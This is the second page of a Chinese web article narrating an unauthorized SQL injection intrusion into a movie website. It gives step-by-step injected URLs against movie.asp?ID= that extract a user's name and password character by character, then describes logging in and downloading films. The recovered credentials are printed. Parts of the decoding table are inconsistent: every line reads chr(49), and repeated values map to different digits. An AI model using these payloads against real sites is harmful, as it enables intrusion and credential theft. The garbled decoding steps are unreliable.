WEB开发网
开发学院网络安全黑客技术 SQL注入网站入侵实例 阅读

SQL注入网站入侵实例

 2008-10-27 16:49:11 来源:WEB开发网   
核心提示: 结果,成功猜中该网站的用户名表名为users4.猜列名至于猜列名,SQL注入网站入侵实例(2),不用我介绍大家都应该清楚怎么做了,把(select count(1) from users)改成(select count(id) from users),破解用了15分钟,45分钟搞掂了一个站

结果,成功猜中该网站的用户名表名为users

4.猜列名

至于猜列名,不用我介绍大家都应该清楚怎么做了,把(select count(1) from users)改成(select count(id) from users),如没提示"找不到字段"就表示字段名是正确的,字段一般不用太费力,在Login的时候看看表单的名称就大概可以猜到一些了。

果然,这个网站也不例外,用户表中字段为ID(数字),UserID(文本),Password(文本),积分字段猜得比较费劲,为money

5.锁定目标

让users表只返回money最多的一个记录,以便进行猜解、并避免猜中一些没money的用户名:

http://www.movie.com/movie.asp?ID=(select 1000 from user where money>1000)   结果:提示子查询不能返回两条以上记录

锁定>10000,提示不变;

锁定>100000,提示找不到记录,说明没有积分大于10万的用户;

从1万到10万逐步缩小范围,得知积分大于25500只有一条记录。

6.计算用户名及密码长度

因为影片的ID大概从1000-1500之间,可以用UserID的长度+1000得出的数(即影片ID)计算用户名长度,键入:

http://www.movie.com/movie.asp?ID=(select len(UserID) %2B 1000 from user where money>25500)%2B是什么?因为地址栏的+号request出来会变成空格,所以+号要用UrlEncode过的%2B表示。结果返回片名为《双雄》的影片,呵呵,怎么办?不是有搜索功能吗?拿去搜一下,看看影片ID是多少吧。

搜索,得出影片ID是1006,显然,用户名长度为1006-1000=6;同样方法,得出密码的长度为8

7.分步破解用户名

有点SQL应用经验的人应该都想到方法了,来,敲入:

http://www.movie.com/movie.asp?ID=(select asc(mid(UserID,1,1)) %2B 1000 from user where money>25500)

呵呵,又返回一部影片,搜索一下,影片ID为1104,即asc(mid(UserID,1,1))=104

同样方法,得出:

  asc(mid(UserID,2,1))=117
  asc(mid(UserID,3,1))=97
  asc(mid(UserID,4,1))=106
  asc(mid(UserID,5,1))=105
  asc(mid(UserID,6,1))=101

因为len(UserID)=6,所以算到第6位就行了,查asc对应表(会编程的可以写几句话算出来),chr(104)=h,chr(117)=u,chr(97)=a,chr(106)=j,chr(105)=i,chr(101)=e

连起来,用户名就是huajie

8.同样的方法破解密码

  asc(mid(Password,1,1))=49 => chr(49)=1
  asc(mid(Password,2,1))=57 => chr(49)=9
  asc(mid(Password,3,1))=55 => chr(49)=7
  asc(mid(Password,4,1))=56 => chr(49)=8
  asc(mid(Password,5,1))=48 => chr(49)=0
  asc(mid(Password,6,1))=55 => chr(49)=7
  asc(mid(Password,7,1))=55 => chr(49)=1
  asc(mid(Password,8,1))=55 => chr(49)=2
  拼起来:19780712,哈哈,又是用生日做密码的!

接下来,输入用户名和密码,登录系统,成功!猜表名列表之前用了30分钟,破解用了15分钟,45分钟搞掂了一个站。接下来做什么?当然是先Down几G的电影下来再说了。

上一页  1 2 

Tags:SQL 注入 网站

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接